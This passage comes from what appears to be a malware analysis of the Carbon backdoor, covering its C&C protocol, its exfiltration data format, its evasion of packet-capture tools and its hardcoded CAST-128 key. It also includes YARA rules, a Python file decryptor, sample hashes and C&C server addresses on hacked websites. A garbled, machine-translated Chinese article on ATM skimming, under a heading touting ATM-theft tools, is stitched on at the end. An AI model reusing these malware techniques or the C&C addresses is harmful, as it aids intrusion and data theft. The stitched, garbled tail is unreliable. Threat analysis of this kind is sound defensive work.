  • enumerate the values key in “HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform” and concatenate each value to the previous string and then append a closing paren.
    • example: “Mozilla/4.0 (compatible; MSIE 8.0.6001.18702.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; Media Center PC 6.0; SLCC2)

The field “trans_timemax” from the section [TIME] is retrieved. It is used to set the timeout for internet requests (through InternetSetOption()). It has a value of 10 minutes by default.

A first GET request is performed on the root page of the C&C web server to check that the host is alive. If no packet capture is running on the system, a new request is done on the C&C server to check if new tasks are available. A “PHPSESSID” cookie is added to the request with the victim uuid as its value. A header “Referer” is added as well and set to the C&C server URL.

The malware is expecting to get an answer to the GET request similar to:

  • <input name=”%name%” value=”%data_in_b64%”>

If the field “value” contains something, a new task is available.

Send data to the server

If the file “C_56743.NLS” / “dsntype.gif” is not empty, it means there are data to be sent the C&C server. The file is parsed and the last line is retrieved. It contains details about the data to be sent. A data blob is built and each of the following fields is encrypted with CAST-128:

  • id | val | tmp_filesize | tmp_content | [OPTIONAL (if val == 2) tmp2_filesize | tmp2_content] | len_object_id | object_id
    • id = the type of data to send to the C&C server, it can be:
      • 10: log backup
      • 11: configuration file
      • 20: a cryptographic key
      • otherwise: an id associated to a task, it can be the result of a task or an error log in the case of task execution failure
    • val = 1 if there is only one file to send, 2 if there are two files
    • object_id = the victim uuid

If the field “dtc” from the section [CRYPTO] of the configuration file is set to 0, this whole blob is base64 encoded and sent to the C&C server through a POST request.

Otherwise, another layer of encryption is used. In this case, the data blob is signed and a random 3DES key is used to encrypt it. Because the 3DES key is randomly generated and the server needs it to decrypt the data, the key is encrypted with the server public key. The server key is retrieved from the field “publicc” of the section [CRYPTO] from the configuration file.

This new blob (encrypted_key | signature_data | encrypted data) is encoded in base64 and sent to the C&C server through a POST request.

In order to avoid detection based on the data size sent in a request, the blob can be fragmented into several packets. An option in the configuration file (“post_frag” in the section [TRANSPORT]) defines whether the blob will be fragmented or sent in only one POST request.

If this option is set to “yes”, the blob is divided into several fragments of a specific size. This size comes from another field in the configuration file: “post_frag_size”.

An additional header will be added to the request:

  • “Content-Range: bytes %u-%u/%u; id=%u\r\n”, i, i+(fragment_size-1), data_size, task_id”

If the option http11 is set, a specific header is added as well:

  • “Expect: 100-continue\r\n”

For each fragments sent, the fields “post_frag_size” and “pfslastset” from the config file (section [CW_INET_RESULTS]) are updated with the fragment size and the timestamp.

Get new tasks

New tasks are retrieved from the C&C server by parsing the html page. The malware expects to find the html tag <input> in the page with a base64 encoded blob in its “value” attribute. Once decoded, this blob contains:

  • an encrypted block of 128 bytes that contains a structure “PUBLICKEYSTRUC” followed by a cryptographic key (probably a 3DES key)
  • signature data (128 bytes) to verify the integrity of the next block
  • a block of encrypted data that contains the task

The malware uses an RSA private key (retrieved from the field “keypair” from the section [CRYPTO] of the configuration file) to decrypt the first block and then uses the freshly decrypted key to decrypt the third block. This block of data can be either:

  • a task to be executed[6]
    • the data are decrypted and stored in few temporary files, the task (a command or a PE file) and its configuration file in the “Nls” folder and the output files (file that will contains the task results and the logfile) are stored in the folder “0208” (or respectively “0409” and “1033” for Carbon v3.8x)
    • task_id | task_filepath | task_config_filepath | task_result_filepath | task_log_filepath
    • this line is appended to beginning of the file “b9s3coff.ax” (cifrado.xml on v3.8x)
  • a task to be executed by the orchestrator[7]
    • the data are decrypted and stored in few temporary files (the task, its configuration etc) in the “Nls” and “0208” folder (or “0409” and “1033” for Carbon v3.8x)
    • depending of the content of the data, one of these lines will be added to the beginning of the file “a67ncode.ax” (encodebase.info on v3.8x)
      • task_id | task_filepath | task_config_filepath | task_result_filepath | task_log_filepath
      • task_id | task_filepath | task_config_filepath | task_result_filepath | task_log_filepath | execution_mode | username | password
      • task_id | task_filepath | task_config_filepath | task_result_filepath | task_log_filepath | execution_mode
  • a new RSA server public key
    • in this case, the configuration file is updated with the new key encoded in base64 (field publicc)
  • data to be sent to an instance of Carbon running in another computer in the same network
    • the data can contains a specific IP address and port, a named pipe or a named pipe with a username and password.

Check Internet availability

Each hour, the internet connection is checked. A first check is done by calling the function InternetAttemptConnect(). If it works, another test is done by sending HTTP GET requests to the following websites:

  • www.google.com
  • www.yahoo.com
  • www.bing.com
  • update.microsoft.com
  • windowsupdate.microsoft.com
  • microsoft.com

An event is used to notify the other threads in case of the loss of Internet access.

Configuration file backup

Similar to the logfile, the configuration file is also periodically backed up and sent to the C&C server. The thread executes the code in a specific range of time (between 8h and 20h by default)[8].

The value “configlastsend” is retrieved from the section [TIME] of the configuration file. If the config file has been sent over a month ago, the config file is copied into a temporary file with a random name prefixed by “~D” in the folder “208” (for Carbon v3.7x) or “1033” (for Carbon v3.8x). This file is then encrypted with CAST-128 algorithm.

To notify the thread that communicates with the C&C server that a new file is ready to be sent to the server, the following line is appending to the file “C_56743.NLS” (for Carbon v3.7x) or “dsntype.gif” (for Carbon v3.8x):

  • “11|1|%s|%s”
    • 1st field: an ID to identify the file as a config file
    • 2nd field: 1 (file to be sent to the C&C server)
    • 3rd field: the temp filepath
    • 4rd field: the victim uuid

Last but not least, the attribute “configlastsend” is updated with the current time.

Additional Notes

Calling API functions

The base address of the modules of interest are retrieved by either parsing the PEB or (if the modules are not loaded into the process memory) by loading the needed files from disk into memory and parsing their headers to get their base addresses.

Once the base addresses are retrieved, the PEB is walked again and the field “LoadCount” from the structure LDR_DATA_TABLE_ENTRY is checked. This value is used as a reference counter, to track the loading and unloading of a module.

If “LoadCount” is positive, the module EAT is parsed to get the needed function address.

Encryption

The module and function names are encrypted (at least since v3.77; it was not the case in v3.71) in a simple way, a logical shift of 1 bit being applied to each characters.

The processes’ names are encrypted as well by just XOR’ing each character with the key 0x55 (for Carbon v3.7x at least since v3.77) and with the key 0x77 for Carbon v3.8x.

With only a few the exceptions, each file from the Carbon working directory is encrypted with the CAST-128 algorithm in OFB mode. The same key and IV are used from the version 3.71 until the version 3.81:

  • key = “\x12\x34\x56\x78\x9A\xBC\xDE\xF0\xFE\xFC\xBA\x98\x76\x54\x32\x10”
  • IV = “\x12\x34\x56\x78\x9A\xBC\xDE\xF0”

Check if packet capture is running

Before communicating with the C&C server or with other computers, the malware ensures that none of the most common packet capture software is running on the system:

  • TCPdump.exe
  • windump.exe
  • ethereal.exe
  • wireshark.exe
  • ettercap.exe
  • snoop.exe
  • dsniff.exe

If any of these processes are running, no communication will be done.

Carbon IoCs are also available on ESET’s GitHub repositoryhttps://github.com/eset/malware-ioc/tree/master/turla

Appendices

Yara rules

import “pe”

rule generic_carbon
{
strings:
$s1 = “ModStart”
$s2 = “ModuleStart”
$t1 = “STOP|OK”
$t2 = “STOP|KILL”
condition:
(uint16(0) == 0x5a4d) and (1 of ($s*)) and (1 of ($t*))
}

rule carbon_metadata
{
condition:
(pe.version_info[“InternalName”] contains “SERVICE.EXE” or
pe.version_info[“InternalName”] contains “MSIMGHLP.DLL” or
pe.version_info[“InternalName”] contains “MSXIML.DLL”)
and pe.version_info[“CompanyName”] contains “Microsoft Corporation”
}

Carbon files decryptor/encryptor

carbon_tool.py

#!/usr/bin/env python2

from Crypto.Cipher import CAST
import sys
import argparse

def main():

parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument(“-e”, “–encrypt”, help=”encrypt carbon file”, required=False)
parser.add_argument(“-d”, “–decrypt”, help=”decrypt carbon file”, required=False)

try:
args = parser.parse_args()
except IOError as e:
parser.error(e)
return 0

if len(sys.argv) != 3:
parser.print_help()
return 0

key = “\x12\x34\x56\x78\x9A\xBC\xDE\xF0\xFE\xFC\xBA\x98\x76\x54\x32\x10”
iv = “\x12\x34\x56\x78\x9A\xBC\xDE\xF0”

cipher = CAST.new(key, CAST.MODE_OFB, iv)

if args.encrypt:
plaintext = open(args.encrypt, “rb”).read()
while len(plaintext) % 8 != 0:
plaintext += “\x00”
data = cipher.encrypt(plaintext)
open(args.encrypt + “_encrypted”, “wb”).write(data)
else:
ciphertext = open(args.decrypt, “rb”).read()
while len(ciphertext) % 8 != 0:
ciphertext += “\x00”
data = cipher.decrypt(ciphertext)
open(args.decrypt + “_decrypted”, “wb”).write(data)

if __name__ == “__main__”:
main()

Open Source documentation

Carbon footprint

Table 2 – Carbon sample hashes
SHA1 hash
7f3a60613a3bdb5f1f8616e6ca469d3b78b1b45b
a08b8371ead1919500a4759c2f46553620d5a9d9
4636dccac5acf1d95a474747bb7bcd9b1a506cc3
cbde204e7641830017bb84b89223131b2126bc46
1ad46547e3dc264f940bf62df455b26e65b0101f
a28164de29e51f154be12d163ce5818fceb69233
7c43f5df784bf50423620d8f1c96e43d8d9a9b28
7ce746bb988cb3b7e64f08174bdb02938555ea53
20393222d4eb1ba72a6536f7e67e139aadfa47fe
1dbfcb9005abb2c83ffa6a3127257a009612798c
2f7e335e092e04f3f4734b60c5345003d10aa15d
311f399c299741e80db8bec65bbf4b56109eedaf
fbc43636e3c9378162f3b9712cb6d87bd48ddbd3
554f59c1578f4ee77dbba6a23507401359a59f23
2227fd6fc9d669a9b66c59593533750477669557
87d718f2d6e46c53490c6a22de399c13f05336f0
1b233af41106d7915f6fa6fd1448b7f070b47eb3
851e538357598ed96f0123b47694e25c2d52552b
744b43d8c0fe8b217acf0494ad992df6d5191ed9
bcf52240cc7940185ce424224d39564257610340
777e2695ae408e1578a16991373144333732c3f6
56b5627debb93790fdbcc9ecbffc3260adeafbab
678d486e21b001deb58353ca0255e3e5678f9614
Table 3 – C&C server addresses (hacked websites used as 1st level of proxies
C&C server address
soheylistore.ir:80:/modules/mod_feed/feed.php
tazohor.com:80:/wp-includes/feed-rss-comments.php
jucheafrica.com:80:/wp-includes/class-wp-edit.php
61paris.fr:80:/wp-includes/ms-set.php
doctorshand.org:80:/wp-content/about/
www.lasac.eu:80:/credit_payment/url/
Notes
5. two hours by default, but the waiting time depends of the field value “logperiod” from the “LOG” section of the configuration file
6. check “Tasks execution” part for more details
7. check “Orchestrator / Tasks execution” part for more details
8. depending of the config file, check “Log rotation” for the details

中国骇客云教你ATM卡盗窃驱动程序怎么使用。

如果你保持在主体方面,联邦调查局最近打击ATM卡数据盗窃团伙,其中骗子把假硬件ATM和诱骗用户输入的PIN信息前面,然后记录数据记录设备,以后可以检索。在某些情况下,攻击者使用蓝牙通信从汽车里的电脑停在接近ATM检索信息。驱动由各种与高科技的手段,一个已经收获比一个面具和枪坏家伙更多的距离,都没有枪。

的过程,称为ATM略读,肯定不是一个新概念(但是正如Randy Abrams指出的,很少有真正的新的骗局,他们通常使用的其他地点)。长期以来,银行柜台服务员和其他面向公众的人尝试过小诈骗,口袋里一分钱,美元。我们希望,这是不够的,系统(或老板)会通知,但净整洁的总和超过时间。这里的变化是,技术让骗子这么做基本上是自动的,未被发现,而相对匿名一旦设备到位。

一旦他们把数据写在他们的笔记本电脑,要么是直接通过试图印迹后您的信息给假卡取出现金,或散装销售的黑市场其他骗子一大笔钱。

ATM的不同风格,根据型号和制造商。这起进入骗局,因为如果一个假键盘是安装在顶部的真正关键拦截按键,人们可能不会注意到一些看起来“格格不入”,模型的ATM。同时,房卡槽可以与专业的板挡住了,和一个假的扫描仪安装上面,找房。联邦调查局有一个很好的图像(下图),显示在一个典型的入侵ATM的细微差异。注意屏幕上方的假相机、假键盘覆盖和堵塞的卡槽。假货不好,容易忽视,当然如果你赶时间。

典型的撇在ATM技术(由美国联邦调查局)

由数字,几个套管已被联邦调查局其中一个例子,一个保加利亚国家是“昨天被判入狱21个月,他在一个用复杂的滑行装置的柜员机上至少有1400个客户账户在纽约地区银行偷了180万美元计划的作用。”

他们建议用户检查自动取款机,气泵,或信用卡读卡器使用前…怀疑如果你看到任何松动,歪斜,或损坏,或如果您发现划痕或胶/胶带残留”。同时,对黑客攻击设备在旅游陷阱的了望台,一个受欢迎的目标,并在里面的位置使用ATM机,他们更容易被密切监测篡改。同时,他们说,“如果你的卡不是在交易或击球后“取消返回,立即联系发放信用卡的金融机构。”所以知道这个夏天当你在旅行的时候,偷来的财务信息可以在你的旅程中最不受欢迎的惊喜。